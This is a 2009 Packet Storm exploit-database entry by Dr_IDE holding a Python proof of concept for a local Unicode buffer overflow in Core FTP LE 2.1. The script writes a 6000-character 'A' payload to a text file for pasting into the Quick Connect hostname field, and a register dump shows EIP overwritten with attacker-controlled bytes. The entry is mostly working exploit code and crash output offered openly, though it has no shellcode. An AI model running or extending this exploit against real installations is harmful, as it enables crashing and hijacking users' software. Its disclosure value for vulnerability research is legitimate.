Core FTP LE 2.1 Buffer Overflow

2009-09-26T00:00:00
ID PACKETSTORM:81665
Type packetstorm
Reporter Dr_IDE
Modified 2009-09-26T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
  
####################################################################################  
#  
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)  
# Found By: Dr_IDE  
# Tested On: XPSP3, 7RC  
# Notes: Most likely other versions are vulnerable too.  
# Usage: File, Quick Connect, Paste into Hostname, Connect  
#  
####################################################################################  
  
# Register Dump on XPSP3  
"""  
EAX 00000064  
ECX 00410041 coreftp.00410041  
EDX 0054F840 coreftp.0054F840  
EBX 026E2FFC  
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
EBP 00410041 coreftp.00410041  
ESI 0269CC30  
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
EIP 00410041 coreftp.00410041  
C 0 ES 002B 32bit 0(FFFFFFFF)  
P 0 CS 0023 32bit 0(FFFFFFFF)  
A 0 SS 002B 32bit 0(FFFFFFFF)  
Z 0 DS 002B 32bit 0(FFFFFFFF)  
S 0 FS 0053 32bit 7EFD7000(FFF)  
T 0 GS 002B 32bit 0(FFFFFFFF)  
D 0  
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)  
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)  
ST0 empty 0.0  
ST1 empty 0.0  
ST2 empty 0.0  
ST3 empty 0.0  
ST4 empty 0.0  
ST5 empty 0.0  
ST6 empty 0.0  
ST7 empty 0.0  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
"""  
  
# After Passing Exception on XPSP3  
# EIP 00410041 coreftp.00410041  
  
buff = ("\x41" * 6000)  
  
f1 = open("coreftple.txt","w")  
f1.write(buff)  
f1.close()  
`